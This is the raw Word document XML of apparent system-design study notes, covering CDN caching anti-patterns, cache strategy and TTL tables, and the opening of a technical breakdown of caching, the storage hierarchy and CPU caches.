      </w:r>
    </w:p>
    <w:p w14:paraId="407AE280" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45502290" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:t>Cache-Control: s-maxage=1 (1 second)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E4AD4E4" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:t>→ Content expires before second request arrives → effectively uncached.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07D5FBDC" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:t>Use stale-while-revalidate instead of ultra-short TTLs.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="372BCFE9" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>5. Not using a shield:</w:t>
      </w:r>
      <w:r w:rsidRPr="00784ED6">
        <w:t> → 300 edge PoPs all independently hit origin on miss → 300x origin load amplification.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26D3DED6" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>6. Purging entire cache instead of targeted invalidation:</w:t>
      </w:r>
      <w:r w:rsidRPr="00784ED6">
        <w:t> → Purge everything → cold cache → thundering herd → origin crashes. Use tag-based purge or URL-specific purge.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29186C45" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:pict w14:anchorId="626F5926">
          <v:rect id="_x0000_i4701" style="width:0;height:3pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="28FE5335" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00784ED6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>20. Summary — CDN in the System Design Mental Model</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726"/>
        <w:gridCol w:w="7624"/>
      </w:tblGrid>
      <w:tr w:rsidR="00784ED6" w:rsidRPr="00784ED6" w14:paraId="2033269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CADE50" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00784ED6">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Concern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BF7688" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00784ED6">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>How CDN Addresses It</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00784ED6" w:rsidRPr="00784ED6" w14:paraId="70E2B5E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5C0089" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
            <w:r w:rsidRPr="00784ED6">
              <w:t>Latency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8D82E1" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
            <w:r w:rsidRPr="00784ED6">
              <w:t>Edge PoPs geographically close to users (5–20ms vs 100–300ms)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00784ED6" w:rsidRPr="00784ED6" w14:paraId="3B7F2AC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6A03D0" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
            <w:r w:rsidRPr="00784ED6">
              <w:t>Bandwidth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211DC0" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
            <w:r w:rsidRPr="00784ED6">
              <w:t>Origin serves content once → CDN serves it millions of times</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00784ED6" w:rsidRPr="00784ED6" w14:paraId="3F79146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9856C8" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
            <w:r w:rsidRPr="00784ED6">
              <w:t>Scalability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45E543" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
            <w:r w:rsidRPr="00784ED6">
              <w:t>Horizontal scaling across 300+ PoPs (100+ Tbps capacity)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00784ED6" w:rsidRPr="00784ED6" w14:paraId="2805737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1198AE" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
            <w:r w:rsidRPr="00784ED6">
              <w:t>Availability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1B0115" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
            <w:r w:rsidRPr="00784ED6">
              <w:t>Stale-if-error serves content during origin outage; multi-PoP redundancy</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00784ED6" w:rsidRPr="00784ED6" w14:paraId="767ECC1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2BB1B6" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
            <w:r w:rsidRPr="00784ED6">
              <w:t>Security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4D7B44" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
            <w:r w:rsidRPr="00784ED6">
              <w:t>DDoS absorption, WAF, origin cloaking, TLS termination</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00784ED6" w:rsidRPr="00784ED6" w14:paraId="4B1FE56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69BB18" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
            <w:r w:rsidRPr="00784ED6">
              <w:t>Cost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3B6F0B" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
            <w:r w:rsidRPr="00784ED6">
              <w:t>CDN bandwidth cheaper than origin egress; origin infrastructure reduced</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00784ED6" w:rsidRPr="00784ED6" w14:paraId="2AD33C1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B10D58" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
            <w:r w:rsidRPr="00784ED6">
              <w:t>Performance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59A9C9" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
            <w:r w:rsidRPr="00784ED6">
              <w:t>Protocol optimization (HTTP/2, HTTP/3, TLS 1.3), compression, image optimization</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00784ED6" w:rsidRPr="00784ED6" w14:paraId="2A84A57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B42CEC" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
            <w:r w:rsidRPr="00784ED6">
              <w:t>Global reach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2C1DEC" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
            <w:r w:rsidRPr="00784ED6">
              <w:t>Content available at consistent low latency worldwide</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="3DCC07E4" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>The CDN decision framework:</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939"/>
        <w:gridCol w:w="2583"/>
        <w:gridCol w:w="1144"/>
        <w:gridCol w:w="2684"/>
      </w:tblGrid>
      <w:tr w:rsidR="00784ED6" w:rsidRPr="00784ED6" w14:paraId="54488EB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578ADF" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00784ED6">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Content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776D12" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00784ED6">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Cache Strategy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A02023" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00784ED6">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>TTL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FD94F7" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00784ED6">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Invalidation</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00784ED6" w:rsidRPr="00784ED6" w14:paraId="481C2E9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96D04C" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
            <w:r w:rsidRPr="00784ED6">
              <w:t>Versioned assets (CSS/JS/images)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C1F60E" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
            <w:r w:rsidRPr="00784ED6">
              <w:t>Immutable, max TTL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09806D" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
            <w:r w:rsidRPr="00784ED6">
              <w:t>1 year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90D3DA" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
            <w:r w:rsidRPr="00784ED6">
              <w:t>URL change (version in filename)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00784ED6" w:rsidRPr="00784ED6" w14:paraId="12C381E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33E28A" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
            <w:r w:rsidRPr="00784ED6">
              <w:lastRenderedPageBreak/>
              <w:t>HTML pages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86D538" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
            <w:r w:rsidRPr="00784ED6">
              <w:t>Short TTL + SWR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AEC6BE" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
            <w:r w:rsidRPr="00784ED6">
              <w:t>60s–5min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0B5B8A" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
            <w:r w:rsidRPr="00784ED6">
              <w:t>Purge by URL or tag</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00784ED6" w:rsidRPr="00784ED6" w14:paraId="3D4F04C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5BE477" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
            <w:r w:rsidRPr="00784ED6">
              <w:t>API responses (public)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58B019" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
            <w:r w:rsidRPr="00784ED6">
              <w:t>Medium TTL + SWR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68AD7C" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
            <w:r w:rsidRPr="00784ED6">
              <w:t>30s–5min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D45860" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
            <w:r w:rsidRPr="00784ED6">
              <w:t>Purge by tag</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00784ED6" w:rsidRPr="00784ED6" w14:paraId="1620E24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7674EC" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
            <w:r w:rsidRPr="00784ED6">
              <w:t>API responses (private)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705189" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
            <w:r w:rsidRPr="00784ED6">
              <w:t>Don't cache at CDN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F4B968" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
            <w:r w:rsidRPr="00784ED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798CF2" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
            <w:r w:rsidRPr="00784ED6">
              <w:t>—</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00784ED6" w:rsidRPr="00784ED6" w14:paraId="4E731AF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967B45" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
            <w:r w:rsidRPr="00784ED6">
              <w:t>Video segments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03AAA1" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
            <w:r w:rsidRPr="00784ED6">
              <w:t>Long TTL (immutable segments)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B5D4E7" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
            <w:r w:rsidRPr="00784ED6">
              <w:t>24h+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B589C6" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
            <w:r w:rsidRPr="00784ED6">
              <w:t>Manifest points to new segments</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00784ED6" w:rsidRPr="00784ED6" w14:paraId="110C1B1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DE4BC0" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
            <w:r w:rsidRPr="00784ED6">
              <w:t>User-generated content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0CCC4E" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
            <w:r w:rsidRPr="00784ED6">
              <w:t>Medium TTL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06B816" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
            <w:r w:rsidRPr="00784ED6">
              <w:t>1h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D0DF1C" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
            <w:r w:rsidRPr="00784ED6">
              <w:t>Purge on content edit</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="187782F1" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>The fundamental principle:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BE725A0" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
      <w:r w:rsidRPr="00784ED6">
        <w:t>A CDN transforms the relationship between user growth and infrastructure cost from </w:t>
      </w:r>
      <w:r w:rsidRPr="00784ED6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>linear</w:t>
      </w:r>
      <w:r w:rsidRPr="00784ED6">
        <w:t> (more users = proportionally more origin capacity) to </w:t>
      </w:r>
      <w:r w:rsidRPr="00784ED6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>sub-linear</w:t>
      </w:r>
      <w:r w:rsidRPr="00784ED6">
        <w:t> (more users sharing the same cached content = marginal cost approaches zero). At sufficient scale, serving 1 million users costs barely more than serving 1 user — because the CDN cache serves all of them from the same stored copy.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="012191BF" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="50136FB7" w14:textId="5A07DBFD" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008A51E9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Caching — Deep Technical Breakdown</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14B19B32" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:pict w14:anchorId="25508F5D">
          <v:rect id="_x0000_i4787" style="width:0;height:3pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C9B8D39" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008A51E9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>What Caching Actually Is (The Real Engineering Problem)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7685CF85" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:t>Caching is not simply "storing data temporarily to serve it faster." That definition describes the mechanism but completely misses the engineering depth. Caching is the discipline of </w:t>
      </w:r>
      <w:r w:rsidRPr="008A51E9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>exploiting the non-uniform access patterns of real workloads — specifically temporal locality and spatial locality — to place data closer to the consumer at each level of a storage hierarchy, trading space and consistency complexity for dramatic reductions in access latency and upstream system load.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06771F6D" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:t>The engineering problem caching solves is fundamental to how computers work at every scale: </w:t>
      </w:r>
      <w:r w:rsidRPr="008A51E9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>there is no storage medium that is simultaneously fast, large, and cheap.</w:t>
      </w:r>
      <w:r w:rsidRPr="008A51E9">
        <w:t xml:space="preserve"> This is </w:t>
      </w:r>
      <w:r w:rsidRPr="008A51E9">
        <w:lastRenderedPageBreak/>
        <w:t>not a temporary technological limitation — it is a permanent physical and economic constraint:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22FD40B0" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68A75A3B" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:t>Storage Hierarchy (approximate, 2024):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="773D6F68" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:t xml:space="preserve">  CPU Register:    ~0.3ns,    ~1KB,      ~$millions/GB (amortized in CPU cost)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AE7F128" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:t xml:space="preserve">  L1 Cache:        ~1ns,      ~64KB,     ~$10,000/GB</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F1B2F1E" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:t xml:space="preserve">  L2 Cache:        ~4ns,      ~512KB,    ~$1,000/GB</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50EB9CD1" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:t xml:space="preserve">  L3 Cache:        ~10-40ns,  ~32MB,     ~$100/GB</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79EBCEC5" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:t xml:space="preserve">  DRAM:            ~60-100ns, ~TB,       ~$5/GB</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66685B64" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:t xml:space="preserve">  NVMe SSD:        ~100µs,    ~10s of TB,~$0.10/GB</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C870709" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:t xml:space="preserve">  Spinning HDD:    ~10ms,     ~100s TB,  ~$0.02/GB</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7325B9D6" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:t xml:space="preserve">  Network (LAN):   ~100µs,    Unlimited  ~$0.001/GB/month</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09573138" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:t xml:space="preserve">  Network (WAN):   ~100ms,    Unlimited  ~$0.01/GB</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7107E92A" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:t xml:space="preserve">  Tape:            ~minutes,  Unlimited  ~$0.001/GB</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5788D675" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:t>The latency gap between L1 cache and main memory is 100×. Between memory and NVMe SSD: 1,000×. Between memory and spinning disk: 100,000×. Between a local cache and a remote database over WAN: 1,000,000×. </w:t>
      </w:r>
      <w:r w:rsidRPr="008A51E9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>These are not small differences — they are civilization-scale gaps in performance.</w:t>
      </w:r>
      <w:r w:rsidRPr="008A51E9">
        <w:t> Caching bridges these gaps by keeping frequently accessed data at the fast end of the hierarchy, allowing the system to behave as if it had fast, large, cheap storage — which physics says cannot exist in a single tier.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37983D6A" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:t>The second fundamental insight: </w:t>
      </w:r>
      <w:r w:rsidRPr="008A51E9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>real access patterns are not random.</w:t>
      </w:r>
      <w:r w:rsidRPr="008A51E9">
        <w:t> Zipf's law governs content popularity across virtually every domain — a small fraction of items accounts for a large fraction of accesses. The top 1% of items by popularity typically accounts for 30–50% of all accesses. The top 10% accounts for 60–80%. This distribution is why caching works: you don't need to cache everything, only the popular items. A cache covering 10% of the data space can serve 60–80% of requests — the hit rate is dramatically higher than the storage fraction would suggest.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6678EF76" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:pict w14:anchorId="1E989630">
          <v:rect id="_x0000_i4788" style="width:0;height:3pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="4887678B" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008A51E9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>1. Cache Taxonomy — Every Type of Cache and Its Internal Mechanics</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D9C2BFF" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008A51E9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>CPU Caches — Hardware Caching</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B5089B6" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:lastRenderedPageBreak/>
        <w:t>CPU caches are the most fundamental caches in existence — invisible to application code, managed entirely by hardware, operating at nanosecond timescales. Understanding them explains why data structure design choices in application code matter enormously.</w:t>
      </w:r>
    </w:p>
